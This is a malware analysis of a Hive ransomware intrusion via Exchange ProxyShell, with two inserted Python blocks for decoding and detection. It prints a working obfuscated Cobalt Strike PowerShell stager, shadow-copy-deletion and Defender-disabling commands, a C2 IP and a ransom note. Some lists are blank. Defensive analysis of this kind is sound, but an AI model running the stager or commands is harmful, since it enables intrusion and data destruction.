Hive ransomware analysis (2023)

During a recent customer engagement, Varonis' forensics team investigated a ransomware incident. Several device and file servers were compromised and encrypted by a malicious threat group known as Hive.

Hive, first observed in June 2021, is an affiliate-based ransomware variant used by cybercriminals to conduct ransomware attacks against healthcare facilities, nonprofits, retailers, energy providers, and other industries worldwide. Hive was designed to be distributed in a Ransomware-as-a-Service (RaaS) model that allows affiliates to use it as they see fit.


The variant uses common ransomware tactics, techniques, and procedures (TTPs) to compromise victims' devices. When performing live actions, the operator disables anti-malware protections, then exfiltrates sensitive data and encrypts business files. Its affiliates use various mechanisms to compromise their victims' networks, including phishing emails with malicious attachments, leaked VPN credentials, and exploitation of vulnerabilities in external-facing assets. Furthermore, Hive drops a plain-text ransom note that threatens to publish the victim's data on the 'HiveLeaks' TOR website unless the victim complies with the attacker's demands.


Observation of the attack

The forensics team observed that the actor achieved its malicious goals and encrypted the environment in less than 72 hours from the initial compromise.

Stage 1: ProxyShell and WebShell

First, the attacker exploited several Exchange security vulnerabilities collectively called ProxyShell. The attacker then placed a malicious backdoor script, called a webshell, in a publicly accessible directory on the Exchange server. Such web scripts can execute malicious PowerShell code on the compromised server with SYSTEM privileges.

Stage 2: Cobalt Strike

The PowerShell malware downloaded additional stages from a remote C2 (Command and Control) server associated with the Cobalt Strike framework. The scripts were not written to the file system but were executed directly in memory.

Stage 3: Mimikatz and Pass-The-Hash

Leveraging SYSTEM permissions, the threat actor created a new system administrator user named "user" and proceeded to the credential-dumping stage by invoking Mimikatz. By stealing the domain administrator's NTLM hash, and without having to crack the password, the operator was able to reuse it in a Pass-The-Hash attack and take control of the domain administrator's account.

Stage 4: Scanning for sensitive information

The threat actor performed extensive discovery activities across the entire network. In addition to looking for files that contain "password" in their names, activities observed included scanning the network and collecting IP addresses and device names from networks, followed by RDP to backup servers and other critical assets.

Stage 5: Deploying the ransomware

Ultimately, a custom malware payload called Windows.exe was delivered and executed on multiple devices, leading to extensive encryption and denial of access to files within the organization.

The payload created a plain-text ransom note during the encryption phase.

Initial access

The initial indicator of compromise was the successful exploitation of Microsoft Exchange through vulnerabilities known as ProxyShell.

Unveiled in August 2021, ProxyShell is a Remote Code Execution (RCE) vulnerability. ProxyShell involves a set of three separate security flaws and allows remote attackers to execute arbitrary code on affected Microsoft Exchange Server installations.


  • CVE-2021-34473 (base score: 9.8): Microsoft Exchange Server Remote Code Execution Vulnerability
  • CVE-2021-34523 (base score: 9.8): Microsoft Exchange Server Elevation of Privilege Vulnerability
  • CVE-2021-31207 (base score: 7.2): Microsoft Exchange Server Security Feature Bypass Vulnerability

Microsoft released patches for these three vulnerabilities in April and May 2021 as part of its "Patch Tuesday" releases. CVE-2021-34473 and CVE-2021-34523 were patched (KB5001779) in April 2021. CVE-2021-31207 was patched (KB5003435) in May.

During the investigation, we found evidence of specific exploitation of these CVEs (Common Vulnerabilities and Exposures), which allowed the adversary to successfully deploy webshells on the compromised server.


According to our analysis, four different IP addresses accessed the malicious files:

  • (United States)
  • (EU). Related activity: Cobalt Strike C2 and Log4j vulnerability analysis
  • (Netherlands). Related activity: Cobalt Strike C2 and Log4j vulnerability analysis
  • 91.208.52.149 (Netherlands). Related activity: Cobalt Strike C2 and Log4j vulnerability scan; associated with Emotet, IcedID and QBot


The following malicious files were detected:

These filenames consist of random characters with no apparent meaning. Attackers often use this technique to prevent third parties from finding their webshells by sending HTTP requests for a list of pre-built names known from other campaigns.


The source code of the identified webshells was taken from a public git repository at

Execution

Having established a foothold on the compromised Exchange Server, the threat actor executed several PowerShell commands designed to download malicious files from the remote C2 server to the victim's computer. The attackers executed the malware using commands such as Invoke-Expression (IEX), or by downloading the file's contents directly into the device's memory and executing it there:

Additionally, the attackers executed a further obfuscated PowerShell script that was part of the Cobalt Strike framework:


The Base64-encoded command contains several layers of encoding, but decodes to the following PowerShell command:

function func_get_proc_address {
    # Resolves an exported function address (module + procedure) through System.dll's UnsafeNativeMethods
    Param ($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    # Builds an in-memory delegate type with the given signature via System.Reflection.Emit
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}

# XOR-obfuscated payload, Base64-encoded
[Byte[]]$var_code =
[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIx LcptVXJ6ra yCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDBpbdHcjt/oD/JWHd4sCLmyO98yFY4rSkNpnTutksFjPk1iId3VatKb1qXZnUlBHxy9uRECX2FYx1tCT2QCAktdtYyitbmqWDvjVGRB9bSN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNEwouKSPHnhscH1J2ehVV9xiGIbRbaqS5cqjAmVwq68rbHTbqKwvVPYdIwQX2sCpP4Huf69SBXmMT5Uf78YpcuINAFMaQSn2ghpZ2G7UnqTkvRtIxy6TiOP3eK6FQ1llgA3N8VNacREpvDLUIaZ6/oaEPfm0YlN8JZlys9JSvydexNohj88pn9o2SyWlVIxY8cJLweQz1ZdO2JIzPEnVW4x52BGHMgFqryhE8N1PEyfVnFL/7oUr8aGQvMsusR84zVxpx5+C6a+SP9iBhlQcdopF5Zu0hJsRfacn4nFrojL1nt+/oBQcjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIQGg0VEw0SFRINEREbIzpKg64=')
# Decoding loop: XOR each byte with the key 35 (0x23), then emit the decoded bytes
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}
Write-Output $var_code

The additional "for loop" adds another layer of obfuscation: it XORs every Base64-decoded byte with the key 35 (0x23). We successfully extracted the C2 destination IP address by replicating the decoding process; unsurprisingly, it turned out to be the same address found earlier.


Converting the Base64 to a hexadecimal string and reformatting it with a Python script restored the malicious file. VirusTotal analysis shows 23 of 52 antivirus engines detecting it and attributes the file to the Cobalt Strike framework.
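The decoding steps just described (Base64, then XOR with 35, then a hex string and a search for the embedded C2 address) as a small Python helper. This is an added example, not part of the original analysis or any Varonis tooling; it runs on a constructed sample blob carrying the documentation address 203.0.113.10, not on the real stager.

```python
import base64
import re

XOR_KEY = 35  # the single-byte key used by the decoded stager's for loop


def decode_xor_payload(b64_text, key=XOR_KEY):
    """Base64-decode the blob, then XOR every byte with `key`, mirroring the stager's loop."""
    raw = base64.b64decode(b64_text)
    return bytes(b ^ key for b in raw)


def to_hex_string(data):
    """Render the decoded bytes as a hex string, the form used to rebuild the file for analysis."""
    return data.hex()


# IPv4 candidates inside binary data; the octet range is checked separately below.
IPV4_RE = re.compile(rb"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")


def extract_ipv4(data):
    """Pull IPv4-looking strings out of decoded bytes (where a stager keeps its C2 address)."""
    found = []
    for m in IPV4_RE.findall(data):
        text = m.decode()
        if all(int(o) <= 255 for o in text.split(".")):
            found.append(text)
    return found


# Constructed sample, not the page's blob: a fake stager body with the documentation
# address 203.0.113.10 embedded, XORed with 35 and Base64-encoded the way the command expects.
SAMPLE_PLAINTEXT = b"\x01\x02\x03HDR" + b"\x00" * 6 + b"203.0.113.10" + b"\x00/load\x00"
SAMPLE_B64 = base64.b64encode(bytes(b ^ XOR_KEY for b in SAMPLE_PLAINTEXT)).decode()

if __name__ == "__main__":
    decoded = decode_xor_payload(SAMPLE_B64)
    print(to_hex_string(decoded))
    print(extract_ipv4(decoded))
```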



Using the NT AUTHORITY\SYSTEM privileges obtained, and to maintain persistence on the compromised server, the threat actor created a new account named "user" and added it to the "Remote Desktop Users" and "Administrators" groups. This account was then used for repeated access to "password"-related files, RDP access to backup servers, and more.

Credential access

The threat actor used Mimikatz, a post-exploitation tool, specifically the SekurLSA "logonPasswords" module, which extracts the passwords and NTLM hashes of accounts logged on to the system, and saved the results to a text file on the system. With the administrator's NTLM hash in hand, the threat actor used the pass-the-hash technique to gain highly privileged access to other assets on the network by launching a new command prompt on the affected system:


Lateral movement

Leveraging the stolen domain administrator account, the actor made RDP connections using mstsc.exe with the "/v" parameter to various devices on the network, primarily looking for servers associated with network backups and SQL servers. We strongly believe these actions were taken to confirm the ability to access critical servers before the ransomware was deployed.


A popular public network scanning tool called "SoftPerfect" was used to perform scans on domain assets.


Using the tool, the threat actor obtained the list of domain devices and saved the results to a text file named "domains.txt". To find all active hosts, the attacker ran a batch script called "p.bat", which pinged the hosts in that list and saved the results to a text file called "res.txt".


The p.bat script and the file naming convention correspond to part of the Conti ransomware toolkit, which was provided to that group's affiliates, first leaked on August 21, 2022 and posted on Twitter. This indicates that Hive affiliates are adopting other ransomware gangs' techniques.


The threat actors began their final actions by distributing a file called "windows.exe", the ransomware payload, written in Golang. The payload performs several operations, including shadow copy deletion, disabling security products, clearing Windows event logs and closing file handles, to ensure a smooth encryption process. Below is a brief summary of the commands executed:

  • vssadmin.exe delete shadows /all /quiet: deletes the machine's shadow copies to inhibit system recovery
  • net.exe stop "SamSs" /y: stops the Security Accounts Manager service to prevent alerts from being sent to the SIEM system
  • reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f: disables Windows Defender to avoid detection
  • wevtutil.exe cl security: clears the Windows Security event log
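A detection check for the command sequence above, added here as an example and not part of the original article or any vendor product: four regex rules run over constructed process-creation events, and a host where several of them fire together is flagged as likely ransomware staging rather than a lone administrative action.

```python
import re
from collections import defaultdict

# Detection rules for the four pre-encryption commands documented above, as regexes over the
# process command line. Written for this article; not from Varonis or any vendor ruleset.
RULES = {
    "shadow_copy_deletion": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b.*/all", re.I),
    "samss_service_stop": re.compile(r'\bnet1?(\.exe)?\s+stop\s+"?SamSs"?', re.I),
    "defender_disabled_via_reg": re.compile(
        r'\breg(\.exe)?\s+add\b.*Windows Defender.*DisableAntiSpyware.*/d\s+"?1"?', re.I),
    "security_log_cleared": re.compile(r"\bwevtutil(\.exe)?\s+cl\s+security\b", re.I),
}


def match_rules(cmdline):
    """Names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def parse_event(line):
    """Parse the simplified key=value event format of the constructed sample below
    (cmdline is the last field and may itself contain double quotes)."""
    host = re.search(r"host=(\S+)", line).group(1)
    user = re.search(r"user=(\S+)", line).group(1)
    cmd = re.search(r'cmdline="(.*)"$', line).group(1)
    return {"host": host, "user": user, "cmdline": cmd}


def triage(lines, threshold=2):
    """Group rule hits per host. A host with >= threshold distinct hits is flagged: several
    of these commands on one machine look like ransomware staging, not a lone admin task."""
    hits = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        for name in match_rules(ev["cmdline"]):
            hits[ev["host"]].add(name)
    return {h: {"rules": sorted(r), "flag": len(r) >= threshold} for h, r in hits.items()}


# Constructed sample events (not real telemetry from the incident).
SAMPLE_EVENTS = [
    'host=FS01 user=CORP\\user cmdline="vssadmin.exe delete shadows /all /quiet"',
    'host=FS01 user=CORP\\user cmdline="net.exe stop "SamSs" /y"',
    'host=FS01 user=CORP\\user cmdline="reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f"',
    'host=FS01 user=CORP\\user cmdline="wevtutil.exe cl security"',
    'host=WS07 user=CORP\\jdoe cmdline="wevtutil.exe cl application"',
    'host=BK02 user=CORP\\backupsvc cmdline="vssadmin.exe list shadows"',
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```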

The ransomware walks through all available folders, encrypting the files they contain, and drops a ransom note called "_HOW_TO_DECRYPT.txt" in each folder. Once encryption is complete, it displays the ransom note to inform the user about the attack.

Your network has been breached and all data has been encrypted. Personal data, financial reports and important documents are ready to be disclosed.

In order to decrypt all data and prevent extracted files from being disclosed to http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/, you will need to purchase our decryption software.

Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Login:
Password:

To access .onion websites, download and install the Tor browser from: (the Tor browser not related to us)

Follow the guidelines below to avoid losing your data:
- Do not modify, rename or delete *.key files. Your data cannot be decrypted.
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business. They just won't let you pay. As a result, you will lose everything.
- Do not hire a recovery company. They cannot decrypt without the key. They also don't care about your business. They think they are good negotiators, but they are not. They usually fail. So speak for yourself.
- Do not reject the purchase. Extracted files will be made publicly available.


Ransomware attacks have grown significantly in recent years and remain the preferred method for threat actors looking to maximize profit. The impact of an attack can be damaging. It can potentially damage an organization's reputation, disrupt regular operations, and cause temporary and possibly permanent loss of sensitive data.

While detecting and responding to these incidents can be challenging, most malicious activity can be prevented with security tools, incident response plans, and patches for known vulnerabilities.


The Varonis Forensics Team recommends the following:

  • Patch Exchange Server with the latest Exchange Cumulative Update (CU) and Security Update (SU) provided by Microsoft.
  • Enforce the use of complex passwords and require users to change passwords regularly.
  • Use the Microsoft LAPS solution to revoke local administrator permissions from domain accounts (the principle of least privilege) and regularly scan for and remove inactive user accounts.
  • Block SMBv1 and use SMB signing to protect against pass-the-hash attacks.
  • Restrict access to the minimum required for the employee's role.
  • Automatically detect and prevent access control changes that violate your business rules.
  • Train employees on security principles and ensure they receive security training as part of their cybersecurity plans.
  • Establish basic security practices and define rules of behavior that describe how to manage and protect organization and customer information and other vital data.

MITRE ATT&CK breakdown

1. Initial access

2. Execution

3. Persistence

4. Privilege escalation

5. Defense Evasion

  • Deobfuscate/Decrypt files or information (T1140)
  • Indicator Removal on Host (T1070)

6. Credential Access

  • OS Credential Dumping (T1003)

7. Discovery

  • Remote System Discovery (T1018)

8. Lateral movement

9. Command and Control

10. Impact

  • Data Encrypted for Impact (T1486)


Created user account names

  • "user"

Malicious files

  • advanced port scanner.exe: MD5 4fdabe571b66ceec3448939bfb3ffcd1, SHA-1 763499b37aacd317e7d2f512872f9ed719aacae1
  • Webshell #1: MD5 d46104947d8478030e8bcfcc74f2aef7, SHA-1 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60
  • Webshell #2: MD5 2401f681b4722965f82a3d8199a134ed, SHA-1 2aee699780f06857bb0fb9c0f73e33d1ac87a385


Article information

Author: Gov. Deandrea McKenzie

Last Updated: 03/16/2023
